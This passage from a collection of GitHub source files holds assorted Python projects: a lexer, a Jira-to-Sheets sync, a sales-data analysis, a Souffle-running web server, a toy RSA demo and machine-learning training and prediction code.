with Python's re module.\n # Each of these rules are defined by making declarations with a special prefix t_ to indicate that\n # it defines a token.\n t_PLUS = r'\\+'\n t_MINUS = r'-'\n t_TIMES = r'\\*'\n t_DIVIDE = r'/'\n t_LPAREN = r'\\('\n t_RPAREN = r'\\)'\n t_LBRACK = r'\\{'\n t_RBRACK = r'\\}'\n t_ASSIGN = r':='\n t_COMMA = r','\n t_TEXT = r'\\\"([^\\\\\\n]|(\\\\.))*?\\\"'\n\n # Build the lexer\n def build(self):\n self.lexer = lex.lex(module=self, debug=lexer_debug, optimize=lexer_optimize)\n\n # Test it output\n def test(self, data):\n self.lexer.input(data)\n while True:\n tok = self.lexer.token()\n if not tok:\n break\n print(tok)\n\n # If some kind of action needs to be performed, a token rule can be specified as a function.\n def t_ID(self, t):\n r'[A-Za-z_][A-Za-z0-9_]*'\n t.type = self.reserved.get(t.value, 'ID') # Check for reserved words\n return t\n\n def t_NUMBER(self, t):\n r'\\d+\\.?\\d*'\n t.value = float(t.value)\n return t\n\n def t_COMMENT(self, t):\n r'(//.*?(\\n|$))'\n # still +1 lino\n t.lexer.lineno += 1\n\n # Define a rule so we can track line numbers\n def t_newline(self, t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n # A string containing ignored 
characters (spaces and tabs)\n t_ignore = ' \\t'\n\n # Error handling rule\n def t_error(self, t):\n print(\"Illegal character '%s'\" % t.value[0])\n t.lexer.skip(1)\n\n # Since column information is often only useful in the context of error handling,\n # calculating the column position can be performed when needed as opposed to doing it for each token.\n @staticmethod\n def find_column(_input, token):\n \"\"\"\n Compute column.\n :param _input: the input text string\n :param token: a token instance\n :return:\n \"\"\"\n line_start = _input.rfind('\\n', 0, token.lexpos) + 1\n return (token.lexpos - line_start) + 1\n","repo_name":"EnderQIU/vslcpy","sub_path":"src/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"16890662689","text":"import json\nfrom my_data2 import json_data\nfrom tkt_model import Tkt_Entry\nfrom cdw_sheet_model import SheetsConnector\n\njira_data = json.loads(json_data)\n\ndef get_newhire_tickets_from_jira(tickets):\n tkt_objects = []\n for item in tickets['issues']:\n field = item['fields']\n key = item['key']\n status = field['status']['name']\n start_date = field['customfield_10800']\n address = field['customfield_10825']\n email = field['customfield_10826']\n bundle = field['customfield_10836']['value']\n first = field['customfield_10839']\n last = field['customfield_10840']\n summary = field['summary']\n try:\n assignee = field['assignee']['displayName']\n except:\n assignee = None\n try:\n tmp_list = []\n for tkt in field['description']['content']:\n for item in tkt['content']:\n if 'text' in item.keys():\n tmp_list.append(item['text'])\n desc = ' '.join(tmp_list)\n description = desc\n except:\n description = None\n cdw_entry = Tkt_Entry(key=key, summary=summary, assignee=assignee, start_date_10800=start_date, email_10826=email, bundle_10836=bundle, equipment=description, other_name_10825=address, first_10839=first, last_10840=last, status = status)\n tkt_objects.append(cdw_entry)\n\n return tkt_objects\n\n\ntickets = get_newhire_tickets_from_jira(jira_data)\nwsconnect = SheetsConnector()\nfor tkt in tickets:\n if tkt.get_key() not in wsconnect.get_key_list() and tkt.get_assignee() and tkt.get_status() != 'Done':\n wsconnect.update_row(tkt)\n","repo_name":"bilnkat/JiraToGSheet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1436332861","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# In[4]:\n\n\npro=pd.read_csv('D:\\Python_Diwali_Sales_Analysis-main\\Diwali Sales Data.csv',encoding='unicode_escape')\n\n\n# In[5]:\n\n\npro.head()\n\n\n# In[6]:\n\n\npro.info()\n\n\n# In[7]:\n\n\npro.shape\n\n\n# In[8]:\n\n\npro.drop(['Status','unnamed1'],axis=1,inplace=True)\n\n\n# In[10]:\n\n\npro.head()\n\n\n# from above table we can see that Status and unnamesd1 column are drop. 
we dropped these columns because they contain no data, which is why we don't need them\n\n# In[11]:\n\n\npro.isnull().sum()\n\n\n# In[19]:\n\n\npro.dropna(inplace=True)\n\n\n# In[23]:\n\n\npro.isnull()\n\n\n# In[24]:\n\n\npro.isnull().sum()\n\n\n# In[25]:\n\n\npro.shape\n\n\n# In[30]:\n\n\npro['Amount']=pro['Amount'].astype('int')\n\n\n# In[32]:\n\n\npro['Amount'].dtypes\n\n\n# In[34]:\n\n\npro.columns\n\n\n# In[37]:\n\n\npro.rename(columns={'Marital_Status':'Marriage'})\n\n\n# In[40]:\n\n\npro.describe()\n\n\n# In[42]:\n\n\npro[['Age','Orders','Amount']].describe()\n\n\n# # Data analysis\n# \n\n# Gender
\n\n# In[49]:\n\n\ngen=sns.countplot(x='Gender',data=pro)\n\nfor i in gen.containers:\n    gen.bar_label(i)\n\n\n# In[55]:\n\n\ngen=pro.groupby(['Gender'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False)\ngen\n\n\n# In[56]:\n\n\ngen=pro.groupby(['Gender'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False)\n\n\nsns.barplot(x=\"Gender\",y=\"Amount\",data=gen)\n\n\n# From the above we can see that most of the buyers are female, and the purchasing power of females is even greater than that of males\n\n# Age group
\n\n# In[65]:\n\n\ngen=sns.countplot(x='Age Group',data=pro ,hue='Gender')\n\nfor i in gen.containers:\n    gen.bar_label(i)\n\n\n# In[66]:\n\n\nage=pro.groupby(['Age Group'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False)\nage\n\n\n# In[68]:\n\n\nage=pro.groupby(['Age Group'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False)\n\n\nsns.barplot(x=\"Age Group\",y=\"Amount\",data=age)\n\n\n# From the above graph we can see that most of the buyers are in the 26-35 year age group\n\n# State
\n\n# In[14]:\n\n\nstates=pro.groupby(['State'],as_index=False)['Orders'].sum().sort_values(by='Orders',ascending=False).head(10)\n\nsns.set(rc={'figure.figsize':(15,5)})\n\nsns.barplot(x=\"State\",y=\"Orders\",data=states)\n\n\n# In[33]:\n\n\nstate1=pro.groupby(['State'],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False).head(10)\n\n\nsns.set(rc={'figure.figsize':(15,5)})\n\nsns.barplot(x=\"State\",y=\"Amount\",data=state1)\n\n\n# From the above graph we can see that, unexpectedly, most of the orders and buyers are from Uttar Pradesh, Maharashtra, and Karnataka respectively.\n\n# Marital Status
\n\n# In[18]:\n\n\nMarried=sns.countplot(x='Marital_Status',data=pro)\nsns.set(rc={\"figure.figsize\":(7,5)})\nfor i in Married.containers:\n    Married.bar_label(i)\n\n\n# In[19]:\n\n\ngen=sns.countplot(x='Marital_Status',data=pro ,hue='Gender')\n\nfor i in gen.containers:\n    gen.bar_label(i)\n\n\n# In[21]:\n\n\nstate1=pro.groupby(['Marital_Status',\"Gender\"],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False).head(10)\n\n\n\nsns.barplot(x=\"Marital_Status\",y=\"Amount\",data=state1,hue=\"Gender\")\n\n\n# From the above graph we can see that most of the buyers are married women, and they have high purchasing power\n# \n# \n# Product Category
\n\n# In[43]:\n\n\nsns.set(rc={\"figure.figsize\":(15,5)})\nproduct=sns.countplot(x=\"Product_Category\",data=pro)\n\n\nfor i in product.containers:\n    product.bar_label(i)\n\n\n# In[27]:\n\n\nproduct1=pro.groupby([\"Product_Category\"],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False).head(10)\n\n\n\nsns.barplot(x=\"Product_Category\",y=\"Amount\",data=product1)\n\n\n# From the above graph we can see that most of the products sold are from the Food, Clothing, and Electronics categories\n# \n# Occupation
\n\n# In[31]:\n\n\nocc=sns.countplot(x=\"Occupation\",data=pro)\n\nfor i in occ.containers:\n    occ.bar_label(i)\n\n\n# In[32]:\n\n\nocc1=pro.groupby([\"Occupation\"],as_index=False)['Amount'].sum().sort_values(by='Amount',ascending=False).head(10)\n\nsns.barplot(x=\"Occupation\",y=\"Amount\",data=occ1)\n\n\n# From the above graph we can see that most of the buyers work in IT, Healthcare, and Aviation\n\n# Product ID
\n\n# In[52]:\n\n\nproductids=pro.groupby([\"Product_ID\"],as_index=False)['Orders'].sum().sort_values(by='Orders',ascending=False).head(10)\n\nsns.barplot(x=\"Product_ID\",y=\"Orders\",data=productids)\n\n\n# # Conclusion\n\n# Married women aged between 26-35 years from UP, Maharashtra, and Karnataka, working in IT, Food, and Aviation, are more likely to buy products from the Food, Clothing, and Electronics categories\n\n# \n\n# \n\n# In[ ]:\n\n\n\n\n","repo_name":"sandeshjah/Projects","sub_path":"Data_Analytics_projects/Diwali_data_analysis_project.py","file_name":"Diwali_data_analysis_project.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"25634811726","text":"# gaf_to_func.fly.py\nimport csv\nfrom collections import defaultdict\n\n# SUPPORT = [\"EXP\", \"IMP\", \"ISS\", \"ISM\", \"TAS\", \"IEA\", \"HMP\", \"IDA\", \"IGI\",\n#            \"ISO\", \"IGC\", \"NAS\", \"HGI\", \"IPI\", \"IEP\", \"ISA\", \"RCA\", \"IC\", \"HDA\"]\n\nSUPPORT = [\"EXP\", \"IMP\", \"HMP\", \"HEP\", \"IDA\", \"IGI\", \"HGI\", \"IPI\", \"IEP\", \"HDA\"]\n\nANNOTATION_TYPES = [\"P\", \"F\", \"C\"]  # Use C for Cellular comp.\n\n\n\ndef write_preamble(f):\n    support = \" \".join(SUPPORT)\n    f.write(\"# species: Drosophila melanogaster\\n\")\n    f.write(f\"# support: {support}\\n\")\n    for _ in range(18):\n        f.write(\"# \\n\")\n\n\ndef go_compare(x):\n    go_label = x[0]\n    go_val = int(go_label[3:])\n    return go_val\n\n\nfname = \"sampledata/fb.gaf.clean\"\n\nwith open(fname, \"r\") as f:\n    reader = csv.reader(f, delimiter=\"\\t\")\n    raw_data = list(reader)\n\nfunc_to_go = defaultdict(list)\n\nfor row in raw_data:\n    go_label = row[4]\n    exp_type = row[6]\n    go_type = row[8]\n    id_list = row[10].split(\"|\")\n    \n    for i, item in enumerate(id_list):\n        if item.startswith(\"CG\") or item.startswith(\"CR\"):\n            func_to_go[id_list[i]] += [(go_label, exp_type, go_type)]\n            continue\n        # print(\"no CG\")\n\ngo_to_gene = defaultdict(list)\n\nfor key, vals in func_to_go.items():\n    for go_label, exp_type, go_type in vals:\n        if exp_type in SUPPORT and go_type in ANNOTATION_TYPES:\n            go_to_gene[go_label] += [key]\n\ngo_to_gene_list = sorted(list(go_to_gene.items()), key=go_compare)\nwith open(f\"{fname}.associations.3\", \"w\") as f:\n    write_preamble(f)\n    for go_label, protein_list in go_to_gene_list:\n        protein_str = \" \".join(protein_list)\n        f.write(f\"{go_label}\\tPROTEIN_FUNCTIONALITY\\t{protein_str}\\n\")\n","repo_name":"merterden98/cascade","sub_path":"gaf_to_func.fly.py","file_name":"gaf_to_func.fly.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"1323075927","text":"import http.server\nimport subprocess\nimport os\nimport sys\nimport random\nimport string\nimport tempfile\nimport shutil\nimport json\nfrom threading import Lock\n\n# To start the server:\n# python server.py [port]\n\n# Some common HTTP response codes:\n# 200 - OK, the request was fulfilled.\n# 400 - Bad Request, something is wrong and it's the client's fault\n# 403 - Permission Denied\n# 404 - Not Found\n# 408 - Request Timeout\n# 500 - Internal Server Error, something is wrong and it's our fault\n# 501 - Not Implemented\n\nconfig = json.loads(open(\"config.json\").read())\ntime_limit = config[\"time_limit\"]\nmem_limit = config[\"mem_limit\"]\n\nport = 8000\ntokens = set()\n\nif len(sys.argv) == 2:\n\tport = int(sys.argv[1])\n\nsession_mutex = Lock()\n\ndef 
generate_token():\n\tsession_mutex.acquire()\n\t\n\ttoken = ''.join(random.choices(string.ascii_letters + string.digits, k=8))\n\twhile (token in tokens):\n\t\ttoken = ''.join(random.choices(string.ascii_letters + string.digits, k=8))\n\ttokens.add(token)\n\t\n\tsession_mutex.release()\n\treturn token\n\ndef delete_token(token):\n\tsession_mutex.acquire()\n\ttokens.remove(token)\n\tsession_mutex.release()\n\ndef generate_fact_file(dictionary, path):\n\tfile_name = dictionary[\"name\"]\n\tncols = dictionary[\"ncols\"]\n\tdata = dictionary[\"data\"]\n\toutput_file = os.path.join(path, file_name + \".facts\")\n\tfile = open(output_file, \"w+\")\n\tfor row in data:\n\t\tfile.write(\"\\t\".join(str(e) for e in row))\n\t\tfile.write(\"\\n\")\n\tfile.close()\n\ndef create_temp_dir(token):\n\tpath = os.path.join(tempfile.gettempdir(), \"souffle-web-session\", token)\n\tif os.path.exists(path):\n\t\tshutil.rmtree(path)\n\tos.makedirs(path)\n\treturn path\n\ndef run_souffle(src, dir):\n\targs = [\"./third-party/timeout\", \"-t\", str(time_limit), \"-m\", str(mem_limit), \"--no-info-on-success\", \"-c\", \"souffle\", \"/dev/stdin\", \"-D\", \"-\"]\n\tif dir != None:\n\t\targs.extend([\"-F\", dir])\n\treturn subprocess.run(args, input=src, encoding=\"utf8\", capture_output=True, text=True)\n\nclass RequestHandler(http.server.BaseHTTPRequestHandler):\n\tdef api_do_run(self, basedir):\n\t\tlength = int(self.headers[\"Content-Length\"])\n\t\ttype = self.headers[\"Content-Type\"]\n\t\t\n\t\tif type != \"application/json\":\n\t\t\tself.send_error(400, \"Wrong Content-Type, expected application/json\")\n\t\t\treturn\n\t\t\n\t\tbody = self.rfile.read(length)\n\t\treq = json.loads(body)\n\t\t\n\t\tfor table in req[\"tables\"]:\n\t\t\tgenerate_fact_file(table, basedir)\n\t\t\n\t\tresp = {};\n\n\t\ttry:\n\t\t\tproc = run_souffle(req[\"souffle_code\"], basedir)\n\t\texcept FileNotFoundError:\n\t\t\tself.send_error(500, \"Souffle is not installed\")\n\t\t\treturn\n\t\t\n\t\tif proc.returncode in range(128, 128 + 65):\n\t\t\tself.send_error(408, \"Forcibly killed due to time or memory limit reached\")\n\t\t\treturn;\n\t\t\n\t\tresp[\"return_code\"] = proc.returncode;\n\t\tresp[\"stdout\"] = proc.stdout;\n\t\tresp[\"stderr\"] = proc.stderr;\n\t\t\n\t\trespbytes = bytearray(json.dumps(resp), \"utf8\")\n\n\t\tself.send_response(200)\n\t\tself.send_header(\"Content-Type\", \"application/json\")\n\t\tself.send_header(\"Content-Length\", len(respbytes))\n\t\tself.end_headers()\n\n\t\tself.wfile.write(respbytes)\n\n\tdef do_POST(self):\n\t\tif self.path == \"/api/run\":\n\t\t\tself.error_message_format = \"{\\\"error\\\": \\\"%(message)s\\\"}\"\n\t\t\tself.error_content_type = \"application/json\"\n\t\t\t\n\t\t\tsession = generate_token()\n\t\t\tbasedir = create_temp_dir(session)\n\n\t\t\ttry:\n\t\t\t\tself.api_do_run(basedir)\n\t\t\texcept json.decoder.JSONDecodeError:\n\t\t\t\tself.send_error(400, \"Malformed JSON (invalid syntax)\")\n\t\t\texcept KeyError:\n\t\t\t\tself.send_error(400, \"Malformed request object (missing field?)\")\n\n\t\t\tshutil.rmtree(basedir)\n\t\t\tdelete_token(session)\n\t\telse:\n\t\t\tself.send_error(404)\n\nsv = http.server.ThreadingHTTPServer((\"\", port), RequestHandler)\nprint(\"Starting server on port \" + str(port))\nsv.serve_forever()\n","repo_name":"jbre4/souffle-web","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} 
+{"seq_id":"31064783856","text":"from data import test\nimport math\nimport sys\n\n\ndef binary_search(list, item):\n low = 0\n high = len(list) - 1\n while low <= high:\n middle = math.floor((low + high) / 2)\n if list[middle] == item:\n return middle\n elif list[middle] > item:\n high = middle - 1\n else:\n low = middle + 1\n return \"Not found\"\n\n\nprint(binary_search(test, int(sys.argv[1])))\n","repo_name":"petrussola/challenges-algorithms-1","sub_path":"02_binary_search.py","file_name":"02_binary_search.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2117473142","text":"import torch as t\nimport numpy as np\n\n\nclass Predictor:\n def __init__(self, test, model, batch_size, sequence_length, loss, dropout, times):\n \"\"\"\n Predictor class to predict test dataset\n :param test: iterator\n :param model: trained model\n :param batch_size: batchsize\n :param sequence_length: used window, must be the same as the one used in training\n :param loss: the wanted loss function\n \"\"\"\n self.test = test\n self.loss = loss\n self.model = model\n self.batch_size = batch_size\n self.sequence_length = sequence_length\n self.dropout = dropout\n self.times = times\n\n def predict(self, ):\n \"\"\"\n This function predict an entire sub-dataset from CMAPS\n :return: mean loss, true labels, predicted labels,\n True labels might be > dataset rows due to padding of the last batch while using batchsize = 1\n \"\"\"\n outputs = []\n losses = []\n real = []\n stds = []\n\n with t.no_grad():\n for data in self.test:\n\n\n if t.cuda.is_available():\n\n sequence, label = data[0].cuda(), data[1].cuda()\n else:\n sequence, label = data[0], data[1]\n if sequence.shape[0] < self.batch_size:\n continue\n\n if self.dropout or self.model.get_name() == \"BAYSIAN_LSTM\":\n loss, output, y, std = self.predict_with_uncertainty(sequence, label)\n\n if t.cuda.is_available():\n std = std.cpu()\n stds.extend(std.numpy())\n else:\n stds.extend(std.numpy())\n\n else:\n\n loss, output, y = self.predict_one_sequence(sequence, label)\n\n losses.append(loss)\n if t.cuda.is_available():\n output = output.cpu()\n y = y.cpu()\n outputs.extend(output.numpy())\n real.extend(y.numpy())\n\n else:\n\n outputs.extend(output.numpy())\n real.extend(y.numpy())\n\n return t.mean(t.stack(losses)), np.asarray(outputs), np.asarray(real), np.asarray(stds)\n\n def predict_with_uncertainty(self, x, y):\n \"\"\"\n Get the prediction mean and uncertainty based on standard deviation\n \"\"\"\n\n outputs = t.zeros([self.times, y.shape[0]])\n for i in range(self.times):\n if t.cuda.is_available():\n output = self.model(x).cpu()\n y = y.cpu()\n outputs[i] = output\n else:\n\n outputs[i] = self.model(x)\n\n mean = t.mean(outputs, dim=0)\n std = t.std(outputs, dim=0)\n\n loss = np.sqrt(self.loss(mean, y))\n return loss, mean, y, std\n\n def predict_one_sequence(self, x, y):\n \"\"\"\n Simple pass forward in the network\n :param x: sequence\n :param y: true label RULs\n :return:\n \"\"\"\n outputs = self.model(x)\n\n loss = t.sqrt(self.loss(outputs, y))\n return loss, outputs, y\n","repo_name":"serop-ba/RUL_Estimation_With_Bayesian_NN","sub_path":"src/models/predict_model.py","file_name":"predict_model.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12830605272","text":"import logging.config\nimport yaml\nimport os\nfrom datetime import 
datetime\n\nfrom argparse import ArgumentParser\n\nfrom models import CNN, TrainModel, SetOptimizer\nfrom scripts import AutoScript\nfrom data import SetDataLoader\n\nimport torch.nn as nn\n\nwith open(\"config.yml\",\"r\") as file:\n config = yaml.safe_load(file)\n logging.config.dictConfig(config[\"logger\"])\n\nlogger = logging.getLogger(__name__)\n\nif __name__ == \"__main__\":\n\n parser = ArgumentParser(\"main\")\n\n logger.info(\"Model settings : %s\",config[\"model\"])\n logger.info(\"Training settings : %s\",config[\"train\"])\n logger.info(\"Optimizer settings : %s\",config[\"optimizer\"])\n logger.info(\"DataLoader settings : %s\",config[\"data\"])\n logger.info(\"Checkpoint available : %s\",config[\"checkpoint\"] is not None)\n\n model = CNN(**config[\"model\"])\n optimizer = SetOptimizer(model,**config[\"optimizer\"])\n loader = SetDataLoader(**config[\"data\"])\n trainer = TrainModel(model,\n optimizer,\n criterion=nn.CrossEntropyLoss(),\n train_data=loader,**config[\"train\"])\n\n limit_reached = trainer.train()\n\n if limit_reached:\n logger.info(\"Relaunching a script\")\n checkpoint_path = os.path.join(\"checkpoints\",\"model\" + str(datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\")))\n trainer.export(checkpoint_path)\n autoscripter = AutoScript(config[\"launch_file\"],\"config.yml\")\n autoscripter.modify_config(checkpoint_path)\n autoscripter.launch_scitas_script()\n","repo_name":"arnaudguibbert/ScitasTorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43661491506","text":"from pathlib import Path\nfrom typing import Any, Optional\n\nimport hydra\nimport torch\nfrom clearml import Logger, Task\nfrom omegaconf import DictConfig\nfrom torch import nn\nfrom torch.optim.lr_scheduler import CosineAnnealingWarmRestarts\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom captcha.api.helpers import evaluation\nfrom captcha.config import net_config, system_config, torch_config\nfrom captcha.nets.define_net import define_net\nfrom captcha.training.train_utils import (\n Phase,\n create_dataloader,\n define_optimizer,\n fix_seeds,\n)\n\n\ndef train_one_epoch(\n model,\n dataloader: DataLoader,\n optimizer: Any,\n criterion: Any,\n epoch: int,\n logger: Optional[Logger],\n):\n model.train()\n running_loss = 0\n iters = len(dataloader)\n print(f\"Starting training epoch {epoch}\")\n for batch_n, batch in tqdm(enumerate(dataloader), total=iters):\n optimizer.zero_grad()\n outputs = model(batch[\"image\"].to(torch_config.device))\n loss = criterion(outputs, batch[\"label\"].to(torch_config.device))\n running_loss += loss.item()\n loss.backward()\n optimizer.step()\n\n if logger is not None:\n logger.report_scalar(\n f\"Running_loss\",\n \"train\",\n iteration=(epoch + 1) * batch_n,\n value=running_loss / (batch_n + 1),\n )\n loss = running_loss / iters\n if logger is not None:\n logger.report_scalar(\"Loss\", \"train\", iteration=epoch, value=loss)\n logger.report_scalar(\n \"LR\", \"train\", iteration=epoch, value=optimizer.param_groups[0][\"lr\"]\n )\n\n return loss\n\n\n@hydra.main(version_base=None, config_path=\".\", config_name=\"config\")\ndef train_model(cfg: DictConfig):\n task = (\n Task.init(project_name=\"captcha\", task_name=cfg.train.task_name)\n if cfg.train.log_clearml\n else None\n )\n logger = None if task is None else task.get_logger()\n fix_seeds()\n\n dataloader = create_dataloader(\n 
data_dir=Path(cfg.dataloader.data_dir),\n csv_path=[\n cfg.dataloader.train_path,\n cfg.dataloader.eval_path,\n cfg.dataloader.test_path,\n ],\n augmentations_intensity=cfg.dataloader.augmentations_intensity,\n batch_size=cfg.dataloader.batch_size,\n test_size=cfg.dataloader.test_size,\n )\n\n model = define_net(\n model_name=cfg.net.model_name,\n freeze_grads=cfg.net.freeze_grads,\n outputs=net_config.LEN_TOTAL,\n pretrained=cfg.net.pretrained,\n weights=cfg.net.resume_weights,\n )\n\n criterion = nn.MultiLabelSoftMarginLoss()\n optimizer = define_optimizer(cfg.train.optimizer_name, model)\n if cfg.scheduler.scheduler:\n scheduler = CosineAnnealingWarmRestarts(\n optimizer,\n T_0=cfg.scheduler.t0,\n T_mult=cfg.scheduler.t_mult,\n eta_min=0.000001,\n )\n else:\n scheduler = None\n loss = 0.0\n\n for epoch in range(cfg.train.epochs):\n loss = train_one_epoch(\n model, dataloader[Phase.train], optimizer, criterion, epoch, logger\n )\n _ = evaluation(\n model,\n dataloader[Phase.val],\n criterion,\n epoch,\n logger,\n phase=Phase.val.value,\n )\n if dataloader.get(Phase.test) is not None:\n _ = evaluation(\n model,\n dataloader[Phase.test],\n criterion,\n epoch,\n logger,\n phase=Phase.test.value,\n )\n if scheduler:\n scheduler.step()\n\n if cfg.train.model_save_path:\n model_save_path = system_config.model_dir / cfg.train.model_save_path\n model_save_path.mkdir(exist_ok=True, parents=True)\n print(f\"Saving model to {model_save_path} as model.pth\")\n torch.save(\n model, system_config.model_dir / cfg.train.model_save_path / \"model.pth\"\n )\n\n if logger is not None:\n logger.flush()\n\n return loss\n\n\nif __name__ == \"__main__\":\n train_model()\n","repo_name":"AstrakhantsevaAA/Captcha","sub_path":"captcha/training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12284521824","text":"from math import gcd\n\n# функция эйлера\ndef euler(x):\n r = 0\n for i in range(1, x):\n if gcd(x, i) == 1:\n r += 1\n return r\n\np = 11\nq = 29\nn = p * q\nfn = (p - 1) * (q - 1)\nprint(f'euler: {euler(n)}')\nprint(f'(p-1)*(q-1): {fn}')\n\n# выбираем число e (открытая экспонента)\n# это простое число и в идеале число Ферма\n# e должна быть взаимо простым числом с n ???\ne = 3\n\n# получаем число используя функцию эйлера\nd = e ** (euler(euler(n)) - 1) % fn\nprint(d)\n\n# зашифровка сообщения\nm = 10\nc = m ** e % n\n\n# расшифровка сообщения\nprint(c ** d % n)","repo_name":"Lashy-Danya/Semestr_6","sub_path":"cryptography/lab_6/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20203456935","text":"\"\"\"\nSummary: DCASE 2017 task 4 Large-scale weakly supervised \n sound event detection for smart cars. 
Ranked 1 in DCASE 2017 Challenge.\nAuthor: Yong Xu, Qiuqiang Kong\nCreated: 03/04/2017\nModified: 31/10/2017\n\"\"\"\nfrom __future__ import print_function \nimport sys\ntry:\n import cPickle\nexcept BaseException:\n print('cPickle not found, use _pickle instead ...')\n import _pickle as cPickle\n\nimport numpy as np\nimport argparse\nimport glob\nimport time\nimport os\n\nimport keras\nfrom keras import backend as K\nfrom keras.models import Sequential,Model, load_model, model_from_json\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten, Reshape, Permute,Lambda, RepeatVector\nfrom keras.layers.convolutional import ZeroPadding2D, AveragePooling2D, Conv2D,MaxPooling2D, Convolution1D,MaxPooling1D\nfrom keras.layers.pooling import GlobalMaxPooling2D\nfrom keras.layers import Input, merge #, Merge not found\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, LearningRateScheduler\nfrom keras.layers import LSTM, SimpleRNN, GRU, TimeDistributed, Bidirectional, Activation\nfrom keras.layers.normalization import BatchNormalization\nimport h5py\nfrom keras.layers.merge import Multiply\nfrom sklearn import preprocessing\nimport random\nfrom keras.optimizers import Adam\n\n# import config as cfg\nfrom prepare_data import create_folder, load_hdf5_data, do_scale\nfrom data_generator import RatioDataGenerator, QueueDataGenerator\n# from evaluation import io_task4, evaluate\n\nprint(sys.path[0])\nsys.path.insert(1, os.path.join(sys.path[0], '../'))\nsys.path.append(os.path.join(sys.path[0], '../vim/'))\nfrom vim import vim_params as vp\nfrom vim import tasksmq\nimport pandas as pd\nfrom utils import utilities\nimport tensorflow as tf\nfrom sklearn import metrics\nimport logging\n\ndef evaluate(model, input, target, stats_dir, probs_dir, iteration, labels_map):\n \"\"\"Evaluate a model.\n\n Args:\n model: object\n output: 2d array, (samples_num, classes_num)\n target: 2d array, (samples_num, classes_num)\n stats_dir: str, directory to write out statistics.\n probs_dir: str, directory to write out output (samples_num, classes_num)\n iteration: int\n\n Returns:\n None\n \"\"\"\n\n utilities.create_folder(stats_dir)\n utilities.create_folder(probs_dir)\n\n # Predict presence probabilittarget\n callback_time = time.time()\n # (clips_num, time_steps, freq_bins) = input.shape\n # (input, target) = utilities.transform_data(input, target)\n\n output = model.predict(input)\n output = output.astype(np.float32) # (clips_num, classes_num)\n\n # Write out presence probabilities\n prob_path = os.path.join(probs_dir, \"prob_{}_iters.p\".format(iteration))\n cPickle.dump(output, open(prob_path, 'wb'))\n\n # Calculate statistics\n stats = utilities.calculate_stats(output, target, labels_map)\n\n # Write out statistics\n stat_path = os.path.join(stats_dir, \"stat_{}_iters.p\".format(iteration))\n cPickle.dump(stats, open(stat_path, 'wb'))\n\n mAP = np.mean([stat['AP'] for stat in stats])\n mAUC = np.mean([stat['auc'] for stat in stats])\n logging.info(\n \"mAP: {:.6f}, AUC: {:.6f}, Callback time: {:.3f} s\".format(\n mAP, mAUC, time.time() - callback_time))\n\n if False:\n logging.info(\"Saveing prob to {}\".format(prob_path))\n logging.info(\"Saveing stat to {}\".format(stat_path))\n\n print('mAP: ', mAP)\n return mAP, mAUC, [stat['AP'] for stat in stats]\n\n# def f1(y_true, y_pred):\n# def recall(y_true, y_pred):\n# \"\"\"Recall metric.\n\n# Only computes a batch-wise average of recall.\n\n# Computes the recall, a metric for multi-label classification of\n# how many relevant items are 
selected.\n# \"\"\"\n# true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n# possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n# recall = true_positives / (possible_positives + K.epsilon())\n# return recall\n\n# def precision(y_true, y_pred):\n# \"\"\"Precision metric.\n\n# Only computes a batch-wise average of precision.\n\n# Computes the precision, a metric for multi-label classification of\n# how many selected items are relevant.\n# \"\"\"\n# true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n# predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n# precision = true_positives / (predicted_positives + K.epsilon())\n# return precision\n# precision = precision(y_true, y_pred)\n# recall = recall(y_true, y_pred)\n# return 2*((precision*recall)/(precision+recall+K.epsilon()))\n\n# CNN with Gated linear unit (GLU) block\ndef block(input):\n cnn = Conv2D(128, (3, 3), padding=\"same\", activation=\"linear\", use_bias=False)(input)\n cnn = BatchNormalization(axis=-1)(cnn)\n\n cnn1 = Lambda(slice1, output_shape=slice1_output_shape)(cnn)\n cnn2 = Lambda(slice2, output_shape=slice2_output_shape)(cnn)\n\n cnn1 = 